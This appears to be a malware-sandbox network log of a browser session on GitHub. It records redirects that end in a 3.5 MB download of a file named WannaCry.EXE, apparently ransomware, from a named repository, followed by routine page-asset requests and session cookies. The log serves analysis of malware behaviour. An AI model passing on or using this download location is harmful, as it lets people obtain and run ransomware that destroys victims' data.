cookie: _gh_sess=xj%2Bwld8nf8z9by3Q%2FwR9LEJtypAijOIBYpef1SyhQYOqxhbfQaOPxLhNePDGM%2FPVAOFa%2FOkURddQBaLeL8PWKAGDYdcfgXfJId7xUhROu4ykpgGi098wIsCE9q%2BpPnT2mH6ej3CrQHSHY1xtH2DTzJaCMWvm6VosMfWozUCfVelM8k%2Byz4yevkk%2FH%2FjLedfMsZrtCaX8t%2BmvY2w1WEtGbEOR%2BqMwFGwfUihVJsFJirmzcQhpp1h1YuU3tIawwE6F6g6ZxZLnvUq%2F6GYZwWaB0A%3D%3D--bNPBQnM1h35VXbC2--69%2F3lJfJUedMLvNuAhy9VQ%3D%3D
cookie: _octo=GH1.1.785614010.1729199062
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC

Response

HTTP/2.0 302

server: GitHub.com
date: Thu, 17 Oct 2024 21:04:44 GMT
content-type: text/html; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
location: https://github.com/limiteci/WannaCry/raw/refs/heads/main/WannaCry.EXE
cache-control: no-cache
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-length: 0
x-github-request-id: C454:298401:1875AC:1B7840:67117BEC
GET

https://github.com/limiteci/WannaCry/raw/refs/heads/main/WannaCry.EXE

msedge.exe

Remote address:

20.26.156.215:443

Request

GET /limiteci/WannaCry/raw/refs/heads/main/WannaCry.EXE HTTP/2.0
host: github.com
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: same-origin
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
sec-ch-ua-mobile: ?0
referer: https://github.com/limiteci/WannaCry?tab=readme-ov-file
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=xj%2Bwld8nf8z9by3Q%2FwR9LEJtypAijOIBYpef1SyhQYOqxhbfQaOPxLhNePDGM%2FPVAOFa%2FOkURddQBaLeL8PWKAGDYdcfgXfJId7xUhROu4ykpgGi098wIsCE9q%2BpPnT2mH6ej3CrQHSHY1xtH2DTzJaCMWvm6VosMfWozUCfVelM8k%2Byz4yevkk%2FH%2FjLedfMsZrtCaX8t%2BmvY2w1WEtGbEOR%2BqMwFGwfUihVJsFJirmzcQhpp1h1YuU3tIawwE6F6g6ZxZLnvUq%2F6GYZwWaB0A%3D%3D--bNPBQnM1h35VXbC2--69%2F3lJfJUedMLvNuAhy9VQ%3D%3D
cookie: _octo=GH1.1.785614010.1729199062
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC

Response

HTTP/2.0 302

server: GitHub.com
date: Thu, 17 Oct 2024 21:04:45 GMT
content-type: text/html; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
access-control-allow-origin:
location: https://raw.githubusercontent.com/limiteci/WannaCry/refs/heads/main/WannaCry.EXE
cache-control: no-cache
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-length: 0
x-github-request-id: C454:298401:1875C2:1B7852:67117BEC
GET

https://avatars.githubusercontent.com/u/70485500?v=4&size=40

msedge.exe

Remote address:

185.199.110.133:443

Request

GET /u/70485500?v=4&size=40 HTTP/2.0
host: avatars.githubusercontent.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: max-age=300
content-security-policy: default-src 'none'
content-type: image/jpeg
etag: "0f506ea4150a5ffb8fdcf7e92b42a4c2e70ae07b4e19e8cf10dd9ba9e464efc7"
last-modified: Tue, 16 Nov 2021 23:22:17 GMT
strict-transport-security: max-age=31557600
timing-allow-origin: https://github.com
x-content-type-options: nosniff
x-frame-options: deny
x-github-tenant:
x-xss-protection: 1; mode=block
x-github-request-id: 875A:5D30C:5A5C:83FA:66F4A482
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:24 GMT
via: 1.1 varnish
x-served-by: cache-lon4232-LON
x-cache: HIT
x-cache-hits: 0
x-timer: S1729199064.211405,VS0,VE1
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
x-fastly-request-id: cb3ab0e016084679afff27de8bffee61441ac23f
expires: Thu, 17 Oct 2024 21:09:24 GMT
source-age: 1890132
vary: Authorization,Accept-Encoding
content-length: 1074
GET

https://raw.githubusercontent.com/limiteci/WannaCry/refs/heads/main/WannaCry.EXE

msedge.exe

Remote address:

185.199.110.133:443

Request

GET /limiteci/WannaCry/refs/heads/main/WannaCry.EXE HTTP/2.0
host: raw.githubusercontent.com
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
sec-ch-ua-mobile: ?0
referer: https://github.com/limiteci/WannaCry?tab=readme-ov-file
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: max-age=300
content-security-policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
content-type: application/octet-stream
etag: W/"e6fa3937b67d7b17028511eff8847e3c596ba77c55942378a6dbd947a7561603"
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
x-frame-options: deny
x-xss-protection: 1; mode=block
x-github-request-id: 454D:1F835C:1B0EA5:20A8E3:67117BED
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:45 GMT
via: 1.1 varnish
x-served-by: cache-lon4232-LON
x-cache: MISS
x-cache-hits: 0
x-timer: S1729199086.548932,VS0,VE166
vary: Authorization,Accept-Encoding,Origin
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
x-fastly-request-id: ee2342f1e33ecf84cad8a590af2cb47d283681fc
expires: Thu, 17 Oct 2024 21:09:45 GMT
source-age: 0
content-length: 3514368
GET

https://github.githubassets.com/assets/light-3e154969b9f9.css

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/light-3e154969b9f9.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: text/css
last-modified: Fri, 11 Oct 2024 11:04:02 GMT
etag: "0x8DCE9E46A3480FD"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:22 GMT
age: 36984
x-served-by: cache-iad-kjyo7100168-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 15, 1718
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 0f6e7a3a3049e5daeca096d007d304cb9173e755
content-length: 5148
GET

https://github.githubassets.com/assets/dark-9c5b7a476542.css

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/dark-9c5b7a476542.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: text/css
last-modified: Tue, 27 Aug 2024 20:36:01 GMT
etag: "0x8DCC6D7DD54695E"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:22 GMT
age: 3255268
x-served-by: cache-iad-kcgs7200095-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 61, 70972
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 1aa3f5908d0779a2a09defab81264c5e9479fae4
content-length: 6804
GET

https://github.githubassets.com/assets/primer-primitives-4cf0d59ab51a.css

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/primer-primitives-4cf0d59ab51a.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: text/css
last-modified: Tue, 24 Sep 2024 17:30:44 GMT
etag: "0x8DCDCBE9F00AF9E"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:22 GMT
age: 1981768
x-served-by: cache-iad-kiad7000111-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 111, 58757
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 321b20bad7c8ecad87e1212ecdd7ea2ce5bf9a86
content-length: 38553
GET

https://github.githubassets.com/assets/primer-fefb1a332c28.css

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/primer-fefb1a332c28.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: text/css
last-modified: Fri, 27 Sep 2024 21:40:48 GMT
etag: "0x8DCDF3D0D4C7710"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:22 GMT
age: 1478538
x-served-by: cache-iad-kcgs7200067-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 5, 45558
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 6f3257dc95da9062e607df2f978fa24817fa8d67
content-length: 21170
GET

https://github.githubassets.com/assets/global-dfacc4e45ec5.css

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/global-dfacc4e45ec5.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: text/css
last-modified: Fri, 11 Oct 2024 11:04:03 GMT
etag: "0x8DCE9E46AF3C5A9"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:22 GMT
age: 36991
x-served-by: cache-iad-kcgs7200167-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 23, 2664
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 2a7f009eb73c11a300d9e74f4d8c1ee64c5207b3
content-length: 38324
GET

https://github.githubassets.com/assets/github-d1e3b63864f7.css

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/github-d1e3b63864f7.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: text/css
last-modified: Tue, 27 Aug 2024 20:35:59 GMT
etag: "0x8DCC6D7DBFA7D4F"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:22 GMT
age: 4400919
x-served-by: cache-iad-kiad7000157-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 86, 71121
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: ca607918774717131a7d2fcbea86729e53c2b7ce
content-length: 6876
GET

https://github.githubassets.com/assets/primer-react.ed72bee494c072c5b54c.module.css

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/primer-react.ed72bee494c072c5b54c.module.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: text/css
last-modified: Tue, 03 Sep 2024 18:51:51 GMT
etag: "0x8DCCC497906BD46"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:22 GMT
age: 3788437
x-served-by: cache-iad-kiad7000060-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 148, 72098
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 7dc1c4ccd2d8c8ba24e25e17bbda1fd210cd0e79
content-length: 1582
GET

https://github.githubassets.com/assets/notifications-subscriptions-menu.1bcff9205c241e99cff2.module.css

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/notifications-subscriptions-menu.1bcff9205c241e99cff2.module.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: text/css
last-modified: Mon, 26 Aug 2024 16:36:17 GMT
etag: "0x8DCC5ED35736954"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:22 GMT
age: 4420168
x-served-by: cache-iad-kjyo7100115-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 32, 53182
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: fb41ad5e80a6e744a1506865fced95ebea039739
content-length: 479
GET

https://github.githubassets.com/assets/repos-overview.47b2222c697daf78496d.module.css

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/repos-overview.47b2222c697daf78496d.module.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: text/css
last-modified: Mon, 26 Aug 2024 16:36:35 GMT
etag: "0x8DCC5ED40102C90"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:22 GMT
age: 3297726
x-served-by: cache-iad-kjyo7100027-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 29, 37168
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 5fab180a1605f2d9d93de2eef4920e6280ddd3b2
content-length: 220
GET

https://github.githubassets.com/assets/repository-0f7cf89e325a.css

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/repository-0f7cf89e325a.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: text/css
last-modified: Mon, 26 Aug 2024 16:36:35 GMT
etag: "0x8DCC5ED402F5138"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:22 GMT
age: 4420168
x-served-by: cache-iad-kjyo7100173-IAD, cache-lcy-eglc8600092-LCY
x-cache: MISS, HIT
x-cache-hits: 0, 56126
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 2991f5e169852405fa313b8364796b21cff6f820
content-length: 5050
GET

https://github.githubassets.com/assets/code-59de543ca292.css

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/code-59de543ca292.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: text/css
last-modified: Wed, 16 Oct 2024 22:32:14 GMT
etag: "0x8DCEE3262738799"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:22 GMT
age: 60889
x-served-by: cache-iad-kcgs7200112-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 37, 3996
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 29336fb31d2267b590981e4c64e5f377489d26f3
content-length: 5357
GET

https://github.githubassets.com/assets/wp-runtime-ccaf3a5ac52a.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/wp-runtime-ccaf3a5ac52a.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
